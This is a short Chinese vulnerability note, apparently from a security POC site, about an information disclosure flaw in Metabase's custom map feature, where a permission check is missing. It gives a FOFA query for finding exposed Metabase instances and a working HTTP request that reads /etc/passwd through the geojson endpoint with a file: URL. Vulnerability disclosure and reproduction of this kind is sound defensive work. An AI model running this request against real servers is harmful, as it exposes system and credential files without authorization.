漏洞描述
- Metabase是美国Metabase公司的一个开源数据分析平台。Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
资产确定
- fofa:app="Metabase"
漏洞复现
- 1.利用如下POC查询passwd
GET /api/geojson?url=file:/etc/passwd HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */* Connection: close
收藏
发表评论